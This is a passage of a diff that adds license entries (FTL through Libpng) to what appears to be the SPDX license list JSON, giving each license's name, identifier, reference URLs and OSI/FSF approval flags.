+ "reference": "https://spdx.org/licenses/FTL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FTL.json",
+ "referenceNumber": 260,
+ "name": "Freetype Project License",
+ "licenseId": "FTL",
+ "seeAlso": [
+ "http://freetype.fis.uniroma2.it/FTL.TXT",
+ "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
+ "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MirOS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MirOS.json",
+ "referenceNumber": 261,
+ "name": "The MirOS Licence",
+ "licenseId": "MirOS",
+ "seeAlso": [
+ "https://opensource.org/licenses/MirOS"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
+ "referenceNumber": 262,
+ "name": "BSD 2-Clause NetBSD License",
+ "licenseId": "BSD-2-Clause-NetBSD",
+ "seeAlso": [
+ "http://www.netbsd.org/about/redistribution.html#default"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
+ "referenceNumber": 263,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-NC-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
+ "referenceNumber": 264,
+ "name": "OSET Public License version 2.1",
+ "licenseId": "OSET-PL-2.1",
+ "seeAlso": [
+ "http://www.osetfoundation.org/public-license",
+ "https://opensource.org/licenses/OPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
+ "referenceNumber": 265,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-NC-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
+ "referenceNumber": 266,
+ "name": "Sun Industry Standards Source License v1.2",
+ "licenseId": "SISSL-1.2",
+ "seeAlso": [
+ "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Wsuipa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
+ "referenceNumber": 267,
+ "name": "Wsuipa License",
+ "licenseId": "Wsuipa",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Wsuipa"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
+ "referenceNumber": 268,
+ "name": "Zimbra Public License v1.4",
+ "licenseId": "Zimbra-1.4",
+ "seeAlso": [
+ "http://www.zimbra.com/legal/zimbra-public-license-1-4"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
+ "referenceNumber": 269,
+ "name": "Linux Kernel Variant of OpenIB.org license",
+ "licenseId": "Linux-OpenIB",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
+ "referenceNumber": 270,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
+ "referenceNumber": 271,
+ "name": "Open LDAP Public License v2.5",
+ "licenseId": "OLDAP-2.5",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMPAS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
+ "referenceNumber": 272,
+ "name": "Academy of Motion Picture Arts and Sciences BSD",
+ "licenseId": "AMPAS",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
+ "referenceNumber": 273,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BUSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
+ "referenceNumber": 274,
+ "name": "Business Source License 1.1",
+ "licenseId": "BUSL-1.1",
+ "seeAlso": [
+ "https://mariadb.com/bsl11/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
+ "referenceNumber": 275,
+ "name": "Adobe Glyph List License",
+ "licenseId": "Adobe-Glyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/0BSD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/0BSD.json",
+ "referenceNumber": 276,
+ "name": "BSD Zero Clause License",
+ "licenseId": "0BSD",
+ "seeAlso": [
+ "http://landley.net/toybox/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-19980720.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
+ "referenceNumber": 277,
+ "name": "W3C Software Notice and License (1998-07-20)",
+ "licenseId": "W3C-19980720",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFUL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
+ "referenceNumber": 278,
+ "name": "FSF Unlimited License",
+ "licenseId": "FSFUL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
+ "referenceNumber": 279,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-NC-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DOC.json",
+ "referenceNumber": 280,
+ "name": "DOC License",
+ "licenseId": "DOC",
+ "seeAlso": [
+ "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
+ "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TMate.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TMate.json",
+ "referenceNumber": 281,
+ "name": "TMate Open Source License",
+ "licenseId": "TMate",
+ "seeAlso": [
+ "http://svnkit.com/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-open-group.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
+ "referenceNumber": 282,
+ "name": "MIT Open Group variant",
+ "licenseId": "MIT-open-group",
+ "seeAlso": [
+ "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMDPLPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
+ "referenceNumber": 283,
+ "name": "AMD\u0027s plpa_map.c License",
+ "licenseId": "AMDPLPA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Condor-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
+ "referenceNumber": 284,
+ "name": "Condor Public License v1.1",
+ "licenseId": "Condor-1.1",
+ "seeAlso": [
+ "http://research.cs.wisc.edu/condor/license.html#condor",
+ "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
+ "referenceNumber": 285,
+ "name": "PolyForm Noncommercial License 1.0.0",
+ "licenseId": "PolyForm-Noncommercial-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/noncommercial/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
+ "referenceNumber": 286,
+ "name": "BSD 3-Clause No Military License",
+ "licenseId": "BSD-3-Clause-No-Military-License",
+ "seeAlso": [
+ "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
+ "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
+ "referenceNumber": 287,
+ "name": "Creative Commons Attribution 4.0 International",
+ "licenseId": "CC-BY-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
+ "referenceNumber": 288,
+ "name": "Open Government Licence - Canada",
+ "licenseId": "OGL-Canada-2.0",
+ "seeAlso": [
+ "https://open.canada.ca/en/open-government-licence-canada"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
+ "referenceNumber": 289,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
+ "licenseId": "CC-BY-NC-SA-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
+ "referenceNumber": 290,
+ "name": "Eiffel Forum License v1.0",
+ "licenseId": "EFL-1.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/forum.txt",
+ "https://opensource.org/licenses/EFL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Newsletr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
+ "referenceNumber": 291,
+ "name": "Newsletr License",
+ "licenseId": "Newsletr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Newsletr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
+ "referenceNumber": 292,
+ "name": "copyleft-next 0.3.0",
+ "licenseId": "copyleft-next-0.3.0",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
+ "referenceNumber": 293,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
+ "referenceNumber": 294,
+ "name": "Community Data License Agreement Permissive 2.0",
+ "licenseId": "CDLA-Permissive-2.0",
+ "seeAlso": [
+ "https://cdla.dev/permissive-2-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
+ "referenceNumber": 295,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
+ "referenceNumber": 296,
+ "name": "Computational Use of Data Agreement v1.0",
+ "licenseId": "C-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
+ "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Barr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Barr.json",
+ "referenceNumber": 297,
+ "name": "Barr License",
+ "licenseId": "Barr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Barr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Vim.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Vim.json",
+ "referenceNumber": 298,
+ "name": "Vim License",
+ "licenseId": "Vim",
+ "seeAlso": [
+ "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
+ "referenceNumber": 299,
+ "name": "GNU General Public License v2.0 w/Classpath exception",
+ "licenseId": "GPL-2.0-with-classpath-exception",
+ "seeAlso": [
+ "https://www.gnu.org/software/classpath/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
+ "referenceNumber": 300,
+ "name": "BitTorrent Open Source License v1.1",
+ "licenseId": "BitTorrent-1.1",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
+ "referenceNumber": 301,
+ "name": "Common Documentation License 1.0",
+ "licenseId": "CDL-1.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/cdl/",
+ "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
+ "https://www.gnu.org/licenses/license-list.html#ACDL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
+ "referenceNumber": 302,
+ "name": "Creative Commons Attribution Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ADSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ADSL.json",
+ "referenceNumber": 303,
+ "name": "Amazon Digital Services License",
+ "licenseId": "ADSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PostgreSQL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
+ "referenceNumber": 304,
+ "name": "PostgreSQL License",
+ "licenseId": "PostgreSQL",
+ "seeAlso": [
+ "http://www.postgresql.org/about/licence",
+ "https://opensource.org/licenses/PostgreSQL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
+ "referenceNumber": 305,
+ "name": "SIL Open Font License 1.1",
+ "licenseId": "OFL-1.1",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
+ "referenceNumber": 306,
+ "name": "Netscape Public License v1.0",
+ "licenseId": "NPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xinetd.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xinetd.json",
+ "referenceNumber": 307,
+ "name": "xinetd License",
+ "licenseId": "xinetd",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
+ "referenceNumber": 308,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
+ "referenceNumber": 309,
+ "name": "zlib/libpng License with Acknowledgement",
+ "licenseId": "zlib-acknowledgement",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
+ "referenceNumber": 310,
+ "name": "Open LDAP Public License v2.2.1",
+ "licenseId": "OLDAP-2.2.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
+ "referenceNumber": 311,
+ "name": "Apple Public Source License 1.0",
+ "licenseId": "APSL-1.0",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
+ "referenceNumber": 312,
+ "name": "Lawrence Berkeley National Labs BSD variant license",
+ "licenseId": "BSD-3-Clause-LBNL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GLWTPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
+ "referenceNumber": 313,
+ "name": "Good Luck With That Public License",
+ "licenseId": "GLWTPL",
+ "seeAlso": [
+ "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
+ "referenceNumber": 314,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
+ "referenceNumber": 315,
+ "name": "OGC Software License, Version 1.0",
+ "licenseId": "OGC-1.0",
+ "seeAlso": [
+ "https://www.ogc.org/ogc/software/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Dotseqn.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
+ "referenceNumber": 316,
+ "name": "Dotseqn License",
+ "licenseId": "Dotseqn",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Dotseqn"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MakeIndex.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
+ "referenceNumber": 317,
+ "name": "MakeIndex License",
+ "licenseId": "MakeIndex",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MakeIndex"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
+ "referenceNumber": 318,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
+ "referenceNumber": 319,
+ "name": "BSD 3-Clause No Nuclear License 2014",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
+ "seeAlso": [
+ "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
+ "referenceNumber": 320,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IJG.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IJG.json",
+ "referenceNumber": 321,
+ "name": "Independent JPEG Group License",
+ "licenseId": "IJG",
+ "seeAlso": [
+ "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
+ "referenceNumber": 322,
+ "name": "Affero General Public License v1.0 or later",
+ "licenseId": "AGPL-1.0-or-later",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
+ "referenceNumber": 323,
+ "name": "SIL Open Font License 1.1 with no Reserved Font Name",
+ "licenseId": "OFL-1.1-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
+ "referenceNumber": 324,
+ "name": "Boost Software License 1.0",
+ "licenseId": "BSL-1.0",
+ "seeAlso": [
+ "http://www.boost.org/LICENSE_1_0.txt",
+ "https://opensource.org/licenses/BSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Libpng.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Libpng.json",
+ "referenceNumber": 325,
+ "name": "libpng License",
+ "licenseId": "Libpng",
+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
